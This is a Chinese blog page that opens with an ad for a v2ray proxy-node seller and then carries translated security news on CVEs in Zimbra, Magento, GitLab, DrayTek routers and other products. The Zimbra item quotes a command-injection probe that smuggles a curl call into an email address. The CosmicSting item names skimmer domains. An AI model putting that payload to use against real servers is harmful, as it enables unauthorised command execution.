v2ray节点购买推荐 置顶 v2ray节点购买地址推荐
v2ray节点推荐
tz.v2ray.club
10元/100G一月
19元110GB用完为止
39元240G流量用完为止
比较实惠,推荐39元套餐。
里面也有免费套餐,但是比较慢
提供安卓和windows小白端
研究人员发现 Wi-Fi 联盟测试套件中存在命令注入漏洞 网络相关
影响 Wi-Fi 测试套件的安全漏洞可能使未经身份验证的本地攻击者以提升的权限执行任意代码。
计算机应急响应小组 (CERT) 协调中心 (CERT/CC) 表示,该漏洞的编号为CVE-2024-41992,Wi-Fi 联盟的易受攻击代码已发现部署在 Arcadyan FMIMG51AX000J 路由器上。
CERT/CC在周三发布的公告中表示: “该漏洞允许未经身份验证的本地攻击者通过发送特制的数据包来利用 Wi-Fi 测试套件,从而能够在受影响的路由器上以 root 权限执行任意命令。”
Wi-Fi 测试套件是Wi-Fi 联盟开发的集成平台,可自动测试 Wi-Fi 组件或设备。虽然该工具包的开源组件是公开的,但完整套件仅供其成员使用。
SSD Secure Disclosure于 2024 年 8 月发布了该漏洞的详细信息,称这是一个命令注入案例,可能使威胁行为者能够以 root 权限执行命令。该漏洞最初于 2024 年 4 月报告给 Wi-Fi 联盟。
一位独立研究员,其网名为“fj016”,被发现并报告了这些安全漏洞。这位研究员还提供了该漏洞的概念验证 (PoC) 漏洞利用程序。
CERT/CC 指出,Wi-Fi 测试套件不适用于生产环境,但已在商业路由器部署中发现。
报告称:“成功利用此漏洞的攻击者可以完全控制受影响的设备。”
“通过此访问权限,攻击者可以修改系统设置,破坏关键网络服务或完全重置设备。这些操作可能导致服务中断,网络数据泄露,并可能导致所有依赖受影响网络的用户失去服务。”
由于台湾路由器制造商未发布补丁,建议其他已包含 Wi-Fi 测试套件的供应商将其从生产设备中完全删除或将其更新至 9.0 或更高版本,以降低被利用的风险。
Hacker News 已联系 Wi-Fi 联盟寻求进一步评论,我们将在收到回复后更新报道。
Kubernetes 镜像生成器存在严重漏洞,导致节点面临 Root 访问风险 网络相关
Kubernetes Image Builder 中披露了一个严重的安全漏洞,如果成功利用,可能会在某些情况下被滥用来获取 root 访问权限。
该漏洞编号为CVE-2024-9486(CVSS 评分:9.8),已在 0.1.38 版本中得到解决。项目维护人员感谢 Nicolai Rybnikar 发现并报告了该漏洞。
Red Hat 的 Joel Smith在警报中表示: “在 Kubernetes Image Builder 中发现了一个安全问题,在映像构建过程中启用了默认凭据。”
“此外,使用 Proxmox 提供程序构建的虚拟机映像不会禁用这些默认凭据,并且使用生成的映像的节点可以通过这些默认凭据访问。这些凭据可用于获取 root 访问权限。”
话虽如此,只有当 Kubernetes 集群的节点使用通过 Image Builder 项目与 Proxmox 提供程序创建的虚拟机 (VM) 映像时,集群才会受到该漏洞的影响。
作为临时缓解措施,建议禁用受影响虚拟机上的构建器帐户。还建议用户使用固定版本的 Image Builder 重建受影响的映像并将其重新部署到虚拟机上。
Kubernetes 团队实施的修复措施是,在镜像构建期间,随机生成密码,不再使用默认凭据。此外,在镜像构建过程结束时,构建者帐户将被禁用。
Kubernetes Image Builder 版本 0.1.38 还解决了使用 Nutanix、OVA、QEMU 或原始提供程序创建映像构建时默认凭据的相关问题(CVE-2024-9594,CVSS 分数:6.3)。
CVE-2024-9594 的严重性较低,这是因为使用这些提供程序构建的映像的虚拟机仅会受到影响,“如果攻击者能够到达正在构建映像的虚拟机,并利用漏洞在构建映像时修改映像”。
微软发布了针对 Dataverse、Imagine Cup 和 Power Platform 三个严重漏洞的服务器端补丁,这些漏洞可能导致权限提升和信息泄露 -
CVE-2024-38139(CVSS 评分:8.7)——Microsoft Dataverse 中的不正确身份验证允许授权攻击者通过网络提升权限
CVE-2024-38204(CVSS 评分:7.5)——Imagine Cup 中的不当访问控制允许授权攻击者通过网络提升权限
CVE-2024-38190(CVSS 评分:8.6)- Power Platform 中缺少授权,允许未经身份验证的攻击者通过网络攻击媒介查看敏感信息
此前,Apache Solr 开源企业搜索引擎 (CVE-2024-45216,CVSS 评分:9.8) 中也披露了一个严重漏洞,该漏洞可能为易受攻击实例上的身份验证绕过铺平道路。
GitHub 针对该漏洞的公告指出: “任何 Solr API URL 路径末尾的伪造结尾将允许请求跳过身份验证,同时保持与原始 URL 路径的 API 契约。这个伪造结尾看起来像一个不受保护的 API 路径,但它在身份验证之后但在 API 路由之前在内部被剥离。”
该问题影响 Solr 8.11.4 之前的 5.3.0 版本以及 9.7.0 之前的 9.0.0 版本,已分别在 8.11.4 和 9.7.0 版本中得到修复。
在主动零日攻击后,CISA 将 ScienceLogic SL1 漏洞添加到利用目录中 网络相关
此前有报道称 ScienceLogic SL1 存在一个严重安全漏洞,该漏洞被积极利用为零日漏洞。周一,美国网络安全和基础设施安全局 (CISA)将影响 ScienceLogic SL1 的严重安全漏洞添加到其已知被利用漏洞 ( KEV ) 目录中。
该漏洞的编号为CVE-2024-9537(CVSS v4 评分:9.3),指的是涉及未指定的第三方组件的错误,可能导致远程代码执行。
此问题已在 12.1.3、12.2.3 和 12.3 及更高版本中得到解决。版本 10.1.x、10.2.x、11.1.x、11.2.x 和 11.3.x 也已提供修复。
几周前,云托管提供商 Rackspace承认“已发现 ScienceLogic EM7 门户存在问题”,并于上个月底将其仪表板下线。
一个名为 ynezzor 的账户在 2024 年 9 月 28 日的 X 帖子中表示: “我们已经确认,该第三方应用程序的漏洞导致了对三个内部 Rackspace 监控网络服务器的访问。”
目前尚不清楚此次攻击的幕后黑手是谁,但 Rackspace 已向Bleeping Computer证实,零日漏洞导致未经授权访问其内部性能报告系统,并且已通知所有受影响的客户。The Register最先报道了此次入侵事件。
联邦民事行政部门 (FCEB) 机构必须在 2024 年 11 月 11 日之前应用修复程序,以应对其网络可能面临的威胁。
Fortinet 修补可能被利用的漏洞#
目前,Fortinet 已发布 FortiManager 安全更新,以修复据称被与中国有关的威胁行为者利用的漏洞。
目前尚不清楚该漏洞的详细信息,但 Fortinet 过去曾提前发送机密客户通信,以帮助他们在漏洞向更广泛的受众发布之前加强防御。Hacker News 已联系该公司,如果收到回复,我们将更新该报道。
安全研究员 Kevin Beaumont 在 Mastodon上表示:“FortiGate 发布了 FortiManager 的六个新版本之一,修复了产品中被积极利用的零日漏洞……但他们尚未发布 CVE 或在发布说明中记录存在的问题。也许下周?”
“Fortigate 目前拥有中国使用的世界上最不秘密的零日漏洞,包括在 FortiManager Cloud 中……但每个人都很困惑。”
本月初,CISA根据野外利用的证据,在其 KEV 目录中添加了另一个影响 Fortinet FortiOS、FortiPAM、FortiProxy 和 FortiWeb 的严重漏洞(CVE-2024-23113 ,CVSS 评分:9.8)。
WordPress 插件 Jetpack 修补影响 2700 万个站点的重大漏洞 网络相关
Jetpack WordPress 插件的维护人员发布了一个安全更新来修复一个严重漏洞,该漏洞可能允许登录用户访问网站上其他人提交的表单。
Jetpack 是 WordPress 制造商 Automattic 旗下的一款多合一插件,提供一整套工具来提高网站安全性、性能和流量增长。据其网站称,有 2700 万个 WordPress 网站使用了该插件。
据称,该问题是 Jetpack 在内部安全审核期间发现的,并且自 2016 年发布的 3.9.9 版本以来一直存在。
该漏洞存在于 Jetpack 的“联系表单”功能中,“任何登录网站的用户均可利用该漏洞读取网站访问者提交的表单”,Jetpack 的 Jeremy Herve表示。
Jetpack 表示,它与 WordPress.org 安全团队密切合作,在已安装的网站上自动将插件更新为安全版本。
以下 101 个不同版本的 Jetpack 已解决了此缺陷 -
13.9.1、13.8.2、13.7.1、13.6.1、13.5.1、13.4.4、13.3.2、13.2.3、13.1.4、13.0.1、12.9.4、12.8.2、12.7。 2、12.6.3、12.5.1、12.4.1、12.3.1、12.2.2、12.1.2、12.0.2、11.9.3、11.8.6、11.7.3、11.6.2、11.5.3、 11.4.2、11.3.4、11.2.2、11.1.4、11.0.2、 10.9.3、10.8.2、10.7.2、10.6.2、10.5.3、10.4.2、10.3.2、10.2.3、10.1.2、10.0.2、9.9.3、9.8.3、9.7。 3、9.6.4、9.5.5、9.4.4、9.3.5、9.2.4、9.1.3、9.0.5、8.9.4、8.8.5、8.7.4、8.6.4、8.5.3、 8.4.5、8.3.3、8.2.6、8.1.4、8.0.3、7.9.4、7.8.4、7.7.6、 7.6.4、7.5.7、7.4.5、7.3.5、7.2.5、7.1.5、7.0.5、6.9.4、6.8.5、6.7.4、6.6.5、6.5.4、6.4。 6、6.3.7、6.2.5、6.1.5、6.0.4、5.9.4、5.8.4、5.7.5、5.6.5、5.5.5、5.4.4、5.3.4、5.2.5、 5.1.4、5.0.3、4.9.3、4.8.5、4.7.4、4.6.3、4.5.3、4.4.5、4.3.5、4.2.5、 4.1.4、4.0.7、3.9.10
虽然没有证据表明该漏洞曾被利用,但鉴于其被公开披露,未来很有可能被滥用。
值得注意的是,Jetpack 于 2023 年 6 月推出了类似的修复程序,以修复自 2012 年 11 月以来 Jetpack 插件中的另一个严重缺陷。
这一发展发生在WordPress 创始人马特·穆伦韦格 (Matt Mullenweg) 与托管服务提供商 WP Engine之间持续不断的 争执 之中,WordPress.org 控制了后者的高级自定义字段 (ACF) 插件,以创建自己的名为安全自定义字段 (Secure Custom Fields) 的分支。
Mullenweg表示: “SCF 已进行更新,删除了商业追加销售并修复了安全问题。此次更新尽可能简化,以修复安全问题。”
WordPress 并未透露该安全问题的具体性质,但表示该问题与 $_REQUEST 有关。它还表示,该问题已在 Secure Custom Fields 6.3.6.2 版本中得到解决。
WordPress指出: “他们的代码目前并不安全,他们告诉人们在修复漏洞之前不要使用安全自定义字段,这是对客户的失职。” “我们也私下通知过他们,但他们没有回应。”
WP Engine 在 X 上的一篇文章中声称WordPress 从未“在未经同意的情况下”从“创建者”手中“单方面强行”拿走积极开发的插件。
对此,WordPress 表示“这种情况之前已经发生过几次”,并且它保留禁用或从目录中删除任何插件、删除开发人员对插件的访问权限或为了公共安全而“未经开发人员同意”进行更改的权利。
CISA 警告威胁行为者利用 F5 BIG-IP Cookies 进行网络侦察 网络相关
美国网络安全和基础设施安全局 (CISA) 警告称,其发现威胁行为者利用 F5 BIG-IP 本地流量管理器 (LTM) 模块管理的未加密持久 cookie 对目标网络进行侦察。
据称,该模块被用来枚举网络上其他非互联网设备。然而,该机构并未透露此次活动的幕后黑手是谁,也未透露此次活动的最终目标是什么。
CISA在一份咨询报告中表示:“恶意网络行为者可以利用从未加密的持久性 cookie 收集的信息来推断或识别额外的网络资源,并可能利用网络上其他设备中发现的漏洞。”
它还建议各组织通过在 HTTP 配置文件中配置 cookie 加密来加密 F5 BIG-IP 设备中使用的持久性 cookie。此外,它还敦促用户通过运行 F5 提供的名为BIG-IP iHealth的诊断实用程序来验证其系统的保护情况,以识别潜在问题。
F5 在一份支持文件中指出:“BIG-IP iHealth 系统的 BIG-IP iHealth 诊断组件会根据已知问题、常见错误和已发布的 F5 最佳实践的数据库,评估 BIG-IP 系统的日志、命令输出和配置。”
“优先结果提供了有关配置问题或代码缺陷的定制反馈,并提供了问题描述和解决建议。”
与此同时,英国和美国网络安全机构发布联合公告,详细说明了俄罗斯国家支持的行为者针对外交、国防、技术和金融部门收集外国情报并为未来的网络行动提供支持的企图。
此次活动被归咎于一个被追踪为APT29 的威胁行为者,该组织也被称为 BlueBravo、Cloaked Ursa、Cozy Bear 和 Midnight Blizzard。据了解,APT29 是俄罗斯军事情报机器中的关键一环,隶属于对外情报局 (SVR)。
“SVR 网络入侵高度重视保持匿名和不被发现。攻击者在整个入侵过程中广泛使用 TOR——从最初的目标锁定到数据收集——以及整个网络基础设施,”该机构表示。
“这些攻击者使用各种虚假身份和低信誉电子邮件账户来租赁运营基础设施。SVR 从主要托管服务提供商的经销商处获得基础设施。”
APT29 发起的攻击被归类为旨在收集情报和建立持久访问权限以促进供应链入侵的攻击(即意图目标),以及允许他们托管恶意基础设施或利用公开已知的缺陷、弱凭证或其他错误配置从受入侵账户进行后续操作的攻击(即机会目标)。
重点指出的一些重大安全漏洞包括CVE-2022-27924(Zimbra Collaboration 中的命令注入漏洞)和CVE-2023-42793(允许在 TeamCity Server 上执行远程代码的严重身份验证绕过漏洞)。
APT29 是一个相关的例子,威胁行为者不断创新他们的策略、技术和程序,试图保持隐秘并绕过防御,甚至会破坏他们的基础设施并抹去任何证据,以防怀疑他们的入侵被受害者或执法部门发现。
另一种值得注意的技术是广泛使用代理网络,包括移动电话提供商或住宅互联网服务,与位于北美的受害者进行互动并融入合法流量。
该机构表示:“为了阻止这种活动,组织应该对授权设备进行基准检查,并对不遵守基准的访问其网络资源的系统进行额外审查。”
GitLab 新漏洞可能允许任意 CI/CD 管道执行 网络相关
GitLab 发布了社区版(CE)和企业版(EE)的安全更新,以解决八个安全漏洞,包括一个可能允许在任意分支上运行持续集成和持续交付(CI/CD)管道的严重漏洞。
该漏洞的编号为 CVE-2024-9164,CVSS 评分为 9.6(满分 10 分)。
GitLab在一份公告中表示: “GitLab EE 中发现一个问题,影响从 12.5 开始到 17.2.9 之前的所有版本、从 17.3 开始到 17.3.5 之前的所有版本以及从 17.4 开始到 17.4.2 之前的所有版本,该问题允许在任意分支上运行管道。”
在其余七个问题中,四个问题的严重程度评级为高,两个问题的严重程度评级为中等,一个问题的严重程度评级为低 -
CVE-2024-8970(CVSS 评分:8.2),允许攻击者在特定情况下以其他用户身份触发管道
CVE-2024-8977(CVSS 评分:8.2),允许在配置并启用产品分析仪表板的 GitLab EE 实例中发起 SSRF 攻击
CVE-2024-9631(CVSS 评分:7.5),导致查看有冲突的合并请求的差异时速度变慢
CVE-2024-6530(CVSS 评分:7.3),由于跨站点脚本问题,授权新应用程序时会导致 OAuth 页面中出现 HTML 注入
这份公告是 GitLab 近几个月来披露的一系列与管道相关的漏洞中最新的一个。
上个月,该公司解决了另一个严重漏洞(CVE-2024-6678,CVSS 评分:9.9),该漏洞可能允许攻击者以任意用户身份运行管道作业。
在此之前,它还修补了另外三个类似的缺陷——CVE -2023-5009(CVSS 分数:9.6)、CVE-2024-5655(CVSS 分数:9.6)和CVE-2024-6385(CVSS 分数:9.6)。
虽然没有证据表明有人主动利用该漏洞,但建议用户将其实例更新到最新版本以防范潜在威胁。
警报:超过 700,000 台 DrayTek 路由器因 14 个新漏洞而遭受黑客攻击 网络相关
DrayTek 生产的家用和企业路由器中发现了十几个新的安全漏洞,这些漏洞可被利用来接管易受攻击的设备。
Forescout Vedere Labs 在与 The Hacker News 分享的技术报告中表示:“这些漏洞可能使攻击者通过注入恶意代码来控制路由器,从而使他们在设备上持久驻留并将其用作进入企业网络的网关。”
在这 14 个安全漏洞中,两个被评为严重,九个被评为高严重,三个被评为中等严重。最严重的一个漏洞获得了 CVSS 最高评分 10.0。
它涉及 Web 用户界面中“GetCGI()”函数中的缓冲区溢出错误,该错误可能在处理查询字符串参数时导致拒绝服务 (DoS) 或远程代码执行 (RCE)。
另一个严重的漏洞与用于主机和客户机操作系统之间通信的“recvCmd”二进制文件中的操作系统(OS)命令注入有关。
其余 12 个缺陷如下:
整个系统使用相同的管理员凭据,导致整个系统受到攻击(CVSS 评分:7.5)
Web UI 中存在反射型跨站点脚本 (XSS) 漏洞(CVSS 评分:7.5)
配置登录后自定义问候消息时 Web UI 中存在存储型 XSS 漏洞(CVSS 评分:4.9)
配置显示给用户的自定义路由器名称时,Web UI 中存在存储型 XSS 漏洞(CVSS 评分:4.9)
Web UI 登录页面中的反射型 XSS 漏洞(CVSS 评分:4.9)
Web UI 的 CGI 页面“/cgi-bin/v2x00.cgi”和“/cgi-bin/cgiwcg.cgi”中的缓冲区溢出漏洞导致 DoS 或 RCE(CVSS 评分:7.2)
Web UI 的 CGI 页面中的缓冲区溢出漏洞导致 DoS 或 RCE(CVSS 评分:7.2)
Web UI 的“/cgi-bin/ipfedr.cgi”页面中存在堆栈缓冲区溢出漏洞,可导致 DoS 或 RCE(CVSS 评分:7.2)
Web UI 中存在多个缓冲区溢出漏洞,可导致 DoS 或 RCE(CVSS 评分:7.2)
Web UI 的 ft_payloads_dns() 函数中存在基于堆的缓冲区溢出漏洞,可导致 DoS(CVSS 评分:7.2)
Web UI 中的越界写入漏洞导致 DoS 或 RCE(CVSS 评分:7.2)
Web UI 的 Web 服务器后端存在信息泄露漏洞,可能允许威胁行为者执行中间人 (AitM) 攻击(CVSS 评分:7.6)
Forescout 的分析发现,超过 704,000 台 DrayTek 路由器的 Web UI 暴露在互联网上,使其成为恶意行为者攻击的热门地点。大多数暴露的实例位于美国,其次是越南、荷兰、台湾和澳大利亚。
DrayTek 路由器
在负责任地披露之后,DrayTek发布了针对所有已发现缺陷的补丁,并且还在 11 款停产 (EoL) 型号中解决了最高等级的漏洞。
Forescout 表示:“要完全防范新漏洞,需要修补运行受影响软件的设备。如果路由器上启用了远程访问,请在不需要时禁用它。如果可能,请使用访问控制列表 (ACL) 和双因素身份验证 (2FA)。
目前,澳大利亚、加拿大、德国、日本、荷兰、新西兰、韩国、英国和美国的网络安全机构已为关键基础设施组织发布了联合指导,以帮助维护安全、可靠的运营技术 (OT) 环境。
该文件名为“运营技术网络安全原则”,概述了六条基本规则 -
安全至关重要
了解业务至关重要
OT 数据极其宝贵,需要得到保护
将 OT 与所有其他网络进行分段和隔离
供应链必须安全
人员对于 OT 网络安全至关重要
该机构表示:“快速筛选决策以识别那些影响 OT 安全的决策,将有助于在设计、实施和管理 OT 环境时做出稳健、明智和全面的决策,从而促进安全性和业务连续性。”
警报:Adobe Commerce 和 Magento 商店遭受 CosmicSting 漏洞攻击 网络相关
网络安全研究人员透露,5% 的 Adobe Commerce 和 Magento 商店已被恶意行为者利用名为 CosmicSting 的安全漏洞进行攻击。
该严重漏洞的编号为CVE-2024-34102(CVSS 评分:9.8),与 XML 外部实体引用 (XXE) 漏洞的限制不当有关,可能导致远程代码执行。该漏洞由名为“ spacewasp ”的研究人员发现,并于 2024 年 6 月被 Adobe 修补。
荷兰安全公司 Sansec 将CosmicSting描述为“两年来袭击 Magento 和 Adobe Commerce 商店的最严重的漏洞”,并表示这些电子商务网站受到攻击的速度为每小时三到五个。
该漏洞此后遭到广泛利用,促使美国网络安全和基础设施安全局 (CISA) 在 2024 年 7 月中旬将其添加到已知利用漏洞 (KEV) 目录中。
其中一些攻击利用该漏洞窃取 Magento 的秘密加密密钥,然后使用该密钥生成具有完全管理 API 访问权限的 JSON Web 令牌 (JWT)。随后,威胁行为者被观察到利用 Magento REST API 注入恶意脚本。
这也意味着,仅仅应用最新的修复不足以抵御攻击,需要网站所有者采取措施轮换加密密钥。
2024 年 8 月观察到的后续攻击将 CosmicSting 与 CNEXT(CVE-2024-2961,GNU C 库(又名 glibc)内的 iconv 库中的漏洞)相结合,以实现远程代码执行。
Sansec指出:“CosmicSting(CVE-2024-34102)允许在未打补丁的系统上读取任意文件。当与 CNEXT(CVE-2024-2961)结合使用时,威胁行为者可以升级到远程代码执行,从而控制整个系统。”
这些攻击的最终目标是通过 GSocket 在主机上建立持久、隐蔽的访问,并插入恶意脚本,允许执行从攻击者那里收到的任意 JavaScript,以窃取用户在网站上输入的支付数据。
最新调查结果显示,雷朋、国家地理、思科、惠而浦和赛格威等多家公司都已成为 CosmicSting 攻击的受害者,至少有七个不同的团体参与了此类攻击 -
Bobry 小组使用空格编码来隐藏执行托管在远程服务器上的付款窃取器的代码
Polyovki 组,使用来自 cdnstatics.net/lib.js 的注入
Surki 组织,利用 XOR 编码隐藏 JavaScript 代码
布隆杜基组织 (Burunduki),通过 wss://jgueurystatic[.]xyz:8101 的 WebSocket 访问动态 skimmer 代码
Group Ondatry使用自定义 JavaScript 加载恶意软件来注入虚假支付表单,模仿商户网站使用的合法支付表单
Khomyaki 组织将支付信息泄露到包含 2 个字符 URI(“rextension[.]net/za/”)的域名
Belki 组织利用 CosmicSting 和 CNEXT 植入后门和恶意软件
Sansec 表示:“强烈建议商家升级到最新版本的 Magento 或 Adobe Commerce。他们还应该轮换秘密加密密钥,并确保旧密钥失效。”
研究人员警告利用 Zimbra Postjournal 关键漏洞发起的攻击正在持续发生 网络相关
网络安全研究人员警告称,有人试图针对 Synacor 的 Zimbra Collaboration 中新披露的安全漏洞进行主动攻击。
企业安全公司 Proofpoint 表示,它从 2024 年 9 月 28 日开始观察该活动。此次攻击试图利用CVE-2024-45519,这是 Zimbra 后日志服务中的一个严重安全漏洞,可能使未经身份验证的攻击者能够在受影响的安装上执行任意命令。
Proofpoint 在 X 的一系列帖子中表示:“这些冒充 Gmail 的电子邮件被发送到抄送字段中的虚假地址,试图让 Zimbra 服务器解析这些邮件并将其作为命令执行。这些地址包含使用 sh 实用程序执行的 Base64 字符串。”
Zimbra在 2024 年 9 月 4 日发布的8.8.15 Patch 46、9.0.0 Patch 41、10.0.9 和 10.1.1 版本中解决了这一严重问题。一位名为 lebr0nli(Alan Li)的安全研究员因发现并报告这一缺陷而受到赞誉。
Synacor 安全架构师工程师 Ashish Kataria在 2024 年 9 月 19 日的评论中指出: “虽然在大多数系统上,postjournal 功能可能是可选的或未启用的,但仍然有必要应用提供的补丁来防止潜在的攻击。”
“对于未启用 postjournal 功能且无法立即应用补丁的 Zimbra 系统,可以考虑删除 postjournal 二进制文件作为一种临时措施,直到可以应用补丁为止。”
Proofpoint 表示,它确定了一系列 CC 地址,这些地址在解码后会尝试在位于“/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp”的易受攻击的 Zimbra 服务器上写入 Web shell。
随后,已安装的 Web Shell 将使用预定的 JSESSIONID Cookie 字段来监听入站连接,如果存在,则继续解析 JACTION cookie 以获取 Base64 命令。
Web Shell 配备了通过 exec 执行命令的支持。或者,它也可以通过套接字连接下载并执行文件。截至撰写本文时,尚未将这些攻击归咎于已知的威胁行为者或团体。
话虽如此,攻击活动似乎是在 Project Discovery 发布该漏洞的技术细节后的第二天开始的,该细节称“该漏洞源于未修补版本中未经清理的用户输入被传递给popen,从而使攻击者能够注入任意命令”。
该网络安全公司表示,问题根源在于基于 C 的 postjournal 二进制文件在名为“msg_handler()”的函数中处理和解析收件人电子邮件地址的方式,从而允许在传递带有虚假地址的特制 SMTP 消息(例如“aabbb$(curl${IFS}oast.me)”@mail.domain.com)时对运行在端口 10027 上的服务进行命令注入。
鉴于积极的攻击尝试,强烈建议用户应用最新补丁,以获得最佳的防护以抵御潜在威胁。